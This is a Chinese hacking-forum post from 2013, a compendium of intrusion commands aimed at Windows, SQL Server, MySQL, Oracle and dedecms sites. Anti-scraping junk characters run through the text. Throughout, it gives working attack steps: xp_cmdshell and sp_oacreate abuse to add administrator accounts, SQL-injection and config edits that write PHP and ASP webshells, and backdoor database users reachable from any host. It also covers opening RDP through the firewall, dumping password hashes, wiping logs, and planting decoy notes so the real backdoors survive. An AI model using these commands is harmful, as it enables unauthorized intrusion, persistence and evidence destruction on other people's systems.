找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 5253|回复: 0
打印 上一主题 下一主题

渗透技术大全

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 21:24:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

. l: y. q+ S  \9 L, z, o) m1.net user administrator /passwordreq:no4 O* }2 s. Z$ l/ s$ U
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了# [0 q; T4 L7 Z2 `
2.比较巧妙的建克隆号的步骤
: Z$ a7 X, E( ?先建一个user的用户% _3 A, _  `5 r. q5 d" j3 f
然后导出注册表。然后在计算机管理里删掉
' u+ A; K. D6 t$ X3 c6 M4 b在导入,在添加为管理员组
  n# k4 }" [. f) n' I' S4 e2 {3.查radmin密码4 t3 n: ^! o* Z- u
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
8 j7 @; j! ^7 n1 h4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]% z$ ]$ \4 H4 h; G3 J0 I" D# j
建立一个"services.exe"的项. {4 e2 j8 V2 |3 T2 J$ O
再在其下面建立(字符串值)
# t# G' S0 W$ J# T/ ?键值为mu ma的全路径& C2 `9 b+ ]6 a- Z! ^; J. E* I) C
5.runas /user:guest cmd& |0 j% ]0 ^8 x" ^- ?
测试用户权限!) w: a6 i' k7 f! F( e0 o9 I
6.、 tlntadmn config sec = -ntlm    exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'--   其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
+ W% ?& r- o3 u  ?, w6 [% N7.入侵后漏洞修补、痕迹清理,后门置放:
4 D( t- Q3 c: h1 C3 M基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门- T" w6 B9 U5 r+ J; [
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c+ V' q! Z/ a* ?
) _8 {* v; [2 j+ i( N
for example+ N# F. A. F& G9 J# @3 P8 Q

5 S. l- I" ]8 Q8 V6 P6 ideclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'/ e8 W8 p- X6 f+ z) _) x& }
5 G' O2 D3 B4 c: t& u1 o
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
& c9 K# m  T2 S* f7 F" ?
0 O* |3 K( W4 ^5 G+ }  i9:MSSQL SERVER 2005默认把xpcmdshell 给ON了6 L6 U0 Q7 a" g2 i+ f+ g
如果要启用的话就必须把他加到高级用户模式- g7 v! T( K* W. H! M2 x# k
可以直接在注入点那里直接注入
' r0 X" Z6 t+ Jid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--: |  v, A, r5 }, E$ C
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--" A  N- A+ t! r- f! t# Z# }
或者  \" p2 T9 e2 P8 K2 X1 M
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
; G8 u: e3 D: H来恢复cmdshell。
) F% V1 @0 `+ j' c
/ I3 P5 Y/ z' M" U分析器5 }0 A) G. ~) A: ]6 r* T" u- U
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--: v& [/ g/ L$ F
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")9 @2 l7 ]. f3 @
10.xp_cmdshell新的恢复办法- e2 ^* B( i1 |, ?5 I
xp_cmdshell新的恢复办法
7 X  j. J1 c- ^' b* ?" k扩展储存过程被删除以后可以有很简单的办法恢复:
& P3 y$ J/ N$ u* t( P; `5 l; U% b删除  W0 U$ [4 {4 h) O2 o
drop procedure sp_addextendedproc
/ F8 @( W# K* L) O0 M- l7 Y3 pdrop procedure sp_oacreate0 K4 i) h6 u2 Q9 E( }8 g7 ~7 u
exec sp_dropextendedproc 'xp_cmdshell'
4 u5 `0 j4 [6 ^7 ^4 |
- G9 h. }5 o5 W- z恢复
+ Z  i* O' e) \: J1 X  g5 `* }dbcc addextendedproc ("sp_oacreate","odsole70.dll")) W3 q, ?; }: s1 S8 M
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
  ~1 k4 U$ c8 r" O  U' m& y
# ^. `& t$ T" D9 [) n这样可以直接恢复,不用去管sp_addextendedproc是不是存在5 E' w& S) d' |- {! h

& S+ n" L- \$ ?* E-----------------------------
* z2 i0 ?* n8 j- q9 W! R9 D7 l/ |" v. h$ b. W9 t
删除扩展存储过过程xp_cmdshell的语句:: B! r& y2 D* x- C9 a" H6 ~
exec sp_dropextendedproc 'xp_cmdshell'
, o0 J, O9 F" N; t
! a& j0 J* h; P! m5 A恢复cmdshell的sql语句
; a" `' W8 k& B6 x8 A% C" i7 ]exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'* o+ b* ]+ \3 h; G7 Q) c' J8 V

2 @3 r+ m0 p3 i# o0 f8 ^, n, m5 @( S! r' v' K+ Z' w
开启cmdshell的sql语句
: C: ?  O$ M7 P1 h  o$ Q* ^- E6 j& _
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'2 ~% |7 a- }! O$ k' G+ G+ x9 v
; u$ M4 h% c+ Y, C/ g9 h: [
判断存储扩展是否存在
7 j% h4 y& {6 qselect count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'7 ]& @* U! E' I/ N
返回结果为1就ok$ _# f4 n& i5 {7 n. {

$ N8 B- s' P. g% u( t6 n恢复xp_cmdshell+ i- D2 ?  @7 c, B* W: I/ t
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'( }9 Y- U0 _) f8 ]. F
返回结果为1就ok
( Z4 O5 i+ H( ^1 ^3 U* a
! ]$ m( }% ~! {. `# m$ C9 j否则上传xplog7.0.dll
. h- x. j+ e" X7 Hexec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'# [0 @- q$ P; `) w
, F) _7 S- @& Z! N7 q. @" @- v  W
堵上cmdshell的sql语句6 s' A, \5 C1 T2 _
sp_dropextendedproc "xp_cmdshel
+ }& |+ U& l9 |  ]$ ]* p-------------------------3 F7 J3 w5 Q7 S3 c8 N! U/ S) [4 N
清除3389的登录记录用一条系统自带的命令:
2 Z) S& p# J3 I1 r) breg delete "hkcu\Software\Microsoft\Terminal Server Client"  /f2 o2 c+ R/ O" Q! R% `

. H8 N; c$ f% _7 ?# s: z8 ?然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件1 \" `( _" |: _" t- z
在 mysql里查看当前用户的权限% R+ ]- t3 D3 }" S2 Y
show grants for  6 m  p0 j  j& r- C, r
4 |+ ?% V  H/ [& q. W0 J( W  i
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
0 L' C6 s2 z; J/ z' l6 o9 o: b1 r6 p1 t- C# Q
# i9 v+ x5 q9 [. B! c
Create USER 'itpro'@'%' IDENTIFIED BY '123';
( o( Y- a; p% ~7 ^8 A$ ~7 b. P+ b0 k( L8 ?; c3 [# _, b
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
3 m0 @) m" D* I! ]! L; `% d6 s' P, Z$ i' [0 R+ W% U. V7 }, b
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
) o$ j( K4 Y5 m
* \# S3 I1 y3 l6 n0 J, Z7 ?; e( R' mMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;# s9 E( R7 f: E( T8 v! k1 y0 s; d# n4 t
& F' f: |1 `3 H5 i; f- l# c5 v4 c3 Q
搞完事记得删除脚印哟。% k* o. l% j# k' j7 {
1 {- w2 M4 {% F' d/ q1 d( y9 M
Drop USER 'itpro'@'%';8 W; E- u6 Q) A/ J! A
  A! C8 j( I9 _" v7 _
Drop DATABASE IF EXISTS `itpro` ;! V' w5 A  Y/ S; v
/ F( p2 J; {  C& q9 W
当前用户获取system权限
* A9 E$ B# C% C# o" [3 Dsc Create SuperCMD binPath= "cmd /K start" type= own type= interact
+ L9 q* V; `2 _2 rsc start SuperCMD/ e& ^! Y/ w/ K* O
程序代码
; V! {% y! _* W<SCRIPT LANGUAGE="VBScript">
# X; W0 y+ y0 b+ E0 ]  e& {/ l$ d0 `/ Kset wsnetwork=CreateObject("WSCRIPT.NETWORK")
$ n% E6 ]/ w5 ?8 X! los="WinNT://"&wsnetwork.ComputerName, p* G  Q/ u' x" u" z" K# r
Set ob=GetObject(os)
+ h6 e' v* s2 _1 J3 @$ y- TSet oe=GetObject(os&"/Administrators,group")
- S% F; T+ }9 b! {Set od=ob.Create("user","nosec")5 }# G2 e7 b; W
od.SetPassword "123456abc!@#"
  R$ M( A9 G- R+ {3 God.SetInfo
  l/ s+ e; `3 |* ^1 Z0 `* HSet of=GetObject(os&"/nosec",user)
$ ?. A# [- i, u! Joe.add os&"/nosec"$ [, r8 k( |* g0 i! ^
</Script>- M7 W# R% p/ R4 D8 K$ a8 ^7 B
<script language=javascript>window.close();</script>! V. d5 L# \" Z9 X# ~/ z
) }: d# c$ p  T6 ^+ ^
4 {: Z/ I7 I# T+ n
% d9 o! A) |+ f
1 G) l. x# o) V6 C1 v, x9 ~
突破验证码限制入后台拿shell; i; L. ^1 U" l# R
程序代码
" }" |+ H; ?2 p& a  SREGEDIT4 1 _* ~  U! E7 ~' N2 z
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
3 `) z$ N6 ?* k  \"BlockXBM"=dword:00000000
; o$ F$ ?3 O+ F) l( k6 a( [4 \8 F
) @  O0 I0 L) j保存为code.reg,导入注册表,重器IE
$ }( y1 k$ s  W, E就可以了5 `4 ]; c) x: x
union写马
$ r: [' R# y% ?程序代码
6 \- f/ L: k  b+ O4 G$ Fwww.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
, q% |& j; Y; H
! _9 Q0 u/ G8 Y) w& V应用在dedecms注射漏洞上,无后台写马
9 l9 c- o- Q8 H3 fdedecms后台,无文件管理器,没有outfile权限的时候/ J9 y/ @( D' g, B. s7 S  {+ b; o
在插件管理-病毒扫描里
9 T8 Z- K1 [, A' f; D写一句话进include/config_hand.php里1 L0 U8 X! {; A( ?
程序代码
9 c0 M' B3 ]  n6 C9 C0 L, k: S$ o>';?><?php @eval($_POST[cmd]);?>% ~) V% h' a2 m* M  S$ u

5 J. U; \9 l  A7 v
9 ?" Z/ C7 }! E3 H如上格式
: B. u1 u5 o/ C  k8 S2 _( P5 b$ ]! {  W) `8 x  E7 E: r
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
/ ?2 F  l) m* i9 X. G, N, C  s程序代码
5 i. Q1 p' n; k$ a) Eselect username,password from dba_users;
) s3 B6 b5 G5 X1 t6 O' A9 X$ ?5 w! @
0 _7 T* z# J% W% e+ g: l9 ~1 C
mysql远程连接用户: y: ?$ K3 i; L7 d; i
程序代码
0 y8 s6 E8 ]& U0 Y3 r
. L7 H3 B2 F0 b$ F- {0 K4 MCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';* S1 a6 F$ f- `, w# n; ]# |6 p
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION* @  u# ?  N$ B- m
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0* v$ ^, |% d& U  Z" [
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;' G% N- t" w9 v+ s5 W2 t

/ D8 b: w% H# K) c' x2 z+ Q# Y3 c" p% M
6 f1 M4 ?1 O* Z1 M4 @

- ]: B! a4 s7 wecho y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 05 i+ T1 T8 G' J1 c: C( Q7 o0 c3 z
# S4 g# e6 C1 h* ?& O
1.查询终端端口
; H4 T$ i* X+ h) U- ^$ W. F* K' h( |% I# q) n
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
" R! N* Q; L* D
5 f# L$ S5 W- ~3 |通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"/ M2 U6 n) n$ f
type tsp.reg+ @) N: ~" {  S! ^4 [7 r* {
$ M; Y4 Z: x6 }6 Z/ |: L: F
2.开启XP&2003终端服务( b. L$ Y. g2 k! |" ~( C/ m
8 j% o/ n5 C0 z

" |5 O: Z2 W: y! @9 }REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f( f% w. K* {- d. q' y
1 L! W! g2 ]! c* h! M* J2 [
; n' I  w/ W* J, p
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
$ |& @/ w) [! ^$ X; O9 [" Q2 j% T' R
# T$ s0 k7 p3 v* v$ Y3.更改终端端口为20008(0x4E28)
" A) g6 E, u  K9 t
5 v* ~* N/ p9 u) \. Q' ~- u* ZREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
5 L- e( [9 [, |) |" ?" r0 S
- Y, M4 p  |  `3 ?REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
* U+ I* f1 H; S' L
" a9 ~" N$ o/ D7 H4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
6 M+ F% F7 w$ z6 m/ ^8 _7 a- ~! h: O
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f) [- m3 T1 e* x( Y- `, U! n

, K/ Y& u; _4 V7 F2 O; \4 b% u+ t1 G4 S& V* ^) O
5.开启Win2000的终端,端口为3389(需重启): H( y9 d! Q! y3 X

$ Z! i, n! W- F" }echo Windows Registry Editor Version 5.00 >2000.reg * Z3 S9 ~& W) X/ k
echo. >>2000.reg
0 O( A+ ~% R8 j( ]) @: |echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
! i8 w( X) o! _& J2 M+ Jecho "Enabled"="0" >>2000.reg
  O4 e+ ~3 Q6 S( \# ?. R; gecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg . G4 j& c, B5 e
echo "ShutdownWithoutLogon"="0" >>2000.reg
6 q8 r1 z- f0 }& hecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
, |3 J0 W- R- j3 s# Eecho "EnableAdminTSRemote"=dword:00000001 >>2000.reg
. ~7 \* |0 o7 b5 V( P( Eecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg ( I1 k* F/ T3 a5 e$ E2 b
echo "TSEnabled"=dword:00000001 >>2000.reg ) c; f8 u8 b% J
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg & ?4 N8 K% D/ f
echo "Start"=dword:00000002 >>2000.reg * B- w0 Z- K+ g
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
5 ~- k. |6 E' P7 ?: S+ Mecho "Start"=dword:00000002 >>2000.reg   I/ |% g0 H# b; ?" Z* p
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg 4 W" ~  Q* ?8 N5 A* \  a% M# X
echo "Hotkey"="1" >>2000.reg
) e! |" o1 X+ I, Lecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg 4 ]  Q8 K8 y" r) }
echo "ortNumber"=dword:00000D3D >>2000.reg
, h$ O( d9 h5 F( {" j2 w7 secho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg & j, ^6 m0 X2 F9 s
echo "ortNumber"=dword:00000D3D >>2000.reg
. y4 M1 |% i4 W% B) M' O" S- B( X; F7 c' w; ?4 ]  Z8 `3 a
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)+ w" I  T6 k. b; O5 k

5 q9 B/ n/ X- d; L6 h. U  F@ECHO OFF & cd/d %temp% & echo [version] > restart.inf+ D1 Z4 J; {! @5 G- S& C0 x! B
(set inf=InstallHinfSection DefaultInstall)' A3 R* B# J/ k8 y6 C; y
echo signature=$chicago$ >> restart.inf0 ]5 S! }+ i& n- Z5 R8 Q
echo [defaultinstall] >> restart.inf
5 o& \% y" F! f) @rundll32 setupapi,%inf% 1 %temp%\restart.inf
! }6 ]; v7 i/ T) y0 O) H- U; y6 Z) s& V8 |
8 `9 R" _$ g  s+ T4 s; @
7.禁用TCP/IP端口筛选 (需重启)6 h/ @* q) y' j
% T6 |, m$ Y5 v1 a4 Y/ F) ?: B  i0 B
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f, z. d: R. `4 E* k; p1 z

5 t* n( Z. V* g+ M$ |! W9 k8.终端超出最大连接数时可用下面的命令来连接; V1 d3 j3 B% j2 D
( [  L& Z, P* f' L, k) d3 m3 i- O
mstsc /v:ip:3389 /console
1 w! k0 K$ e2 _4 u3 H! c# c8 f1 V, q: u  b
9.调整NTFS分区权限" A6 Y1 |0 H% K( r. L) J2 n
4 V! ]* @5 N7 h) a
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
# i& G. h0 V$ D. a' A* q+ F$ p# d1 U  N! A( r% L! t
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
( M4 Z4 x+ Y- b1 t
( N0 q8 \6 e. a* ~5 B! L------------------------------------------------------
! W8 O: a" E1 Y4 g. p6 n' t3389.vbs , G# M& L' Q; b, V
On Error Resume Next
) h2 I2 ^  c2 h3 Econst HKEY_LOCAL_MACHINE = &H800000029 Z% c( @0 ?$ q( H
strComputer = "."
; ]: g8 }  G: ?* i* j- fSet StdOut = WScript.StdOut
. c1 B$ P( u& k+ v( xSet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_' A' T- l2 I4 |+ }$ I+ F9 U& c
strComputer & "\root\default:StdRegProv"): |" Z1 `8 C2 n' O, k& l
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server". f8 ?4 @( t8 C* D1 i& ?
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath. P3 O9 J& _8 d0 G$ X) q4 S% @7 B# k
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
; X; k" t: z( C1 e+ R9 Eoreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath$ _% Q3 C) u; o2 E
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"" u! @8 S- z+ u: m4 y
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"5 a" T" Q, t7 o3 z
strValueName = "fDenyTSConnections"
9 ^8 r* s/ B( @! J1 AdwValue = 0
9 }4 `2 e" J$ ^! k$ y/ `2 roreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
) G& J: f  h/ ]0 [; f1 @- EstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"4 ~& O9 K6 W$ q) Q2 a! o
strValueName = "ortNumber"8 I, m; E3 J2 r3 z) \
dwValue = 33890 d0 u+ Y. f4 M$ B
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue5 E9 p% T4 r7 v% ]! N
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
, E( @3 Z" E' F' m" \strValueName = "ortNumber"
" V9 j8 }! a& N4 B8 [. @8 t5 JdwValue = 3389
) H7 U8 J- s( n; R* v" s' poreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue1 e8 x6 T9 f) e2 l) J1 l
Set R = CreateObject("WScript.Shell") 1 E. Z, G' p+ D  J
R.run("Shutdown.exe -f -r -t 0")
+ f) B. x! ]3 s  K
1 X; A: n/ }+ y  a删除awgina.dll的注册表键值% g- S  _/ C; L- T
程序代码  R' B; b1 _1 @0 z
( u: x7 g, ~' o/ _1 C* I$ I/ [
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f" J% U, p5 v9 q  K: ^. @8 t

/ p' a" c% l& G! r7 S0 t( U5 h0 O  N- _5 q1 U* M2 m
& h4 T" \: x+ m0 c& h0 Y/ y" w

1 }( t( J/ ~4 N: e程序代码  H9 }+ J0 U3 W" a$ E" s
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash  v% {" ^$ b2 N) m& M: v/ Z

4 d9 n6 u% ]( S$ Y" Q. Q+ [设置为1,关闭LM Hash2 K  W2 D, C1 G! H

9 U8 |, ~2 G: ?1 B+ w: J数据库安全:入侵Oracle数据库常用操作命令2 G( G6 a( o; ]! `# r$ G
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。; b! V. J  ]3 w$ u
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。0 i+ u* Z! r0 m5 U: R
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;  Q* B8 _1 {& z5 ^; \
3、SQL>connect / as sysdba ;(as sysoper)或
( N8 {2 y- U+ v7 `* \connect internal/oracle AS SYSDBA ;(scott/tiger)% M8 m* V0 T7 z9 {, I  f5 `4 o
conn sys/change_on_install as sysdba;" l6 B3 X$ k9 m' ?8 Q5 g
4、SQL>startup; 启动数据库实例
/ W! x3 ]0 b, X5、查看当前的所有数据库: select * from v$database;
! v$ h$ B7 ?( d! Wselect name from v$database;' F* t! ~: y' N3 y& a( P
6、desc v$databases; 查看数据库结构字段
! z) Q: c2 r# B7 c4 F! _( O7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
1 m( P) G5 N+ u5 qSQL>select * from V_$PWFILE_USERS;
( P$ W8 A3 ^& l9 IShow user;查看当前数据库连接用户5 j; K+ M/ h5 W* o/ a- ~
8、进入test数据库:database test;
( m) |) w9 O% }9、查看所有的数据库实例:select * from v$instance;
$ S5 S, ^6 X% J; k3 l如:ora9i
% d" x! g7 C  U# e- j9 G1 y7 v6 Z/ c1 D10、查看当前库的所有数据表:
3 `& F7 B# _$ ]4 t% U% m( `SQL> select TABLE_NAME from all_tables;
( s& i: z! O9 o& wselect * from all_tables;6 v" k, X6 C  Q
SQL> select table_name from all_tables where table_name like '%u%';5 ^3 H) g+ l2 c* J4 c) M# M
TABLE_NAME
+ e6 `4 |% U% I5 C. F# X------------------------------% Q) D  |6 y/ n( H  G2 m
_default_auditing_options_
, O  v7 M) u& ]9 {11、查看表结构:desc all_tables;
5 `/ n& j- r' u' A, V4 d7 e12、显示CQI.T_BBS_XUSER的所有字段结构:5 Y- h( F- W) ]9 {0 F4 U; {2 h
desc CQI.T_BBS_XUSER;
, X4 j+ Z: G) Q0 [" K; I13、获得CQI.T_BBS_XUSER表中的记录:
- S& s+ o/ [1 U3 v/ `  hselect * from CQI.T_BBS_XUSER;9 P: a1 h! a" s' Y* W( |9 R
14、增加数据库用户:(test11/test), w7 w& E. m) }9 b: R
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
- B8 _& ~* x0 y15、用户授权:- o% n/ G7 D& g/ B' G
grant connect,resource,dba to test11;
$ \" P* |0 F6 x, Zgrant sysdba to test11;7 R2 U8 R+ d: c( l5 ^
commit;. r* I3 s3 ^3 Y3 `% j* g
16、更改数据库用户的密码:(将sys与system的密码改为test.)/ Q. i6 _5 X6 ~
alter user sys indentified by test;
* [5 j: x) I& balter user system indentified by test;& X8 ]/ P/ u: n

; c9 }- j" |2 N+ b& v7 capplicationContext-util.xml
1 \, j0 {+ K3 a$ ]% iapplicationContext.xml6 q) h# r4 i! i$ N! Q
struts-config.xml
% X6 a  M' \! T- _web.xml  T0 i0 M* S0 J2 X, r; I! [
server.xml
% E3 ?4 Y  @, Etomcat-users.xml) w/ N8 q) E) n
hibernate.cfg.xml/ A& p% ~6 `5 A8 S& X: b& B* L
database_pool_config.xml' t! J+ v2 k) S" x0 L. M4 l2 [0 |' K( I

7 d; j7 l- P$ [: T5 m0 O0 w9 O- v
  Q2 Z* B' v' o6 g\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置" |( N  ?+ P. w2 t6 z1 p
\WEB-INF\server.xml         类似http.conf+mysql.ini+php.ini
8 Y7 ~! o+ ]. @0 s, i  |' }\WEB-INF\struts-config.xml  文件目录结构
# Z% I" m1 y2 o9 \  h
3 E3 Q( C* j. {* l$ N% x6 T; v. u5 }) ^4 Kspring.properties 里边包含hibernate.cfg.xml的名称3 |# s6 _9 W- F. t3 e$ O8 U# y

2 @  q- P  B  K- F5 V+ @- {+ c
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
% k% L: f; `9 }% P9 R& B1 q, R8 t1 d: @$ i
如果都找不到  那就看看class文件吧。。( y6 u7 d3 M5 \* v- F9 ~6 Y
/ o: |& ]4 Z0 _/ T
测试1:
' b* J) _# G- r2 A2 y( y) hSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1  R; L% I$ f0 U7 r

3 \$ z1 o$ ~0 h测试2:, l& Z9 U8 Q) H3 @, g
9 F+ n( ?$ q% F* V3 G6 V' |
create table dirs(paths varchar(100),paths1 varchar(100), id int)
( g# {# z3 v' {. U' }: G( `- v' V% E' Q1 _
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--, i/ K( G+ Z+ k/ }) K
8 q' w$ A  P+ i4 p- F
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1/ D/ h* _; p5 R) R7 A4 j3 M
' d2 P. G  G4 f. Z7 Y9 A
查看虚拟机中的共享文件:
6 F$ S5 {2 Z- Y) h在虚拟机中的cmd中执行$ o9 I% d4 m% L' E
\\.host\Shared Folders  F, e) K) v9 P, ~: f4 [6 @, V: f

: l, g) }- K1 v5 ncmdshell下找终端的技巧
" U# }& y5 t  B, G找终端:
" I( X; Y" p, F2 j* ]8 N0 S第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! 1 V& Z( l6 U6 c( Z" T3 o
   而终端所对应的服务名为:TermService
1 [2 m1 s9 R) Q+ b8 d. G第二步:用netstat -ano命令,列出所有端口对应的PID值! + |- ?) k7 `: C4 g. K, o* @, {
   找到PID值所对应的端口; s/ q. x! z- F, }! x
2 `( j9 G, u1 z8 L
查询sql server 2005中的密码hash' G' ]$ Y4 @. z6 h
SELECT password_hash FROM sys.sql_logins where name='sa'
+ n9 m( m2 t4 R- g8 D& _( S% CSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
. X# \+ k/ j4 V6 d) gaccess中导出shell; {- o5 Y; x- A

1 w& N0 d7 _+ L2 r0 O2 l中文版本操作系统中针对mysql添加用户完整代码:
- @' ~; T+ l$ |7 s! s  W5 a4 p  }) A
use test;
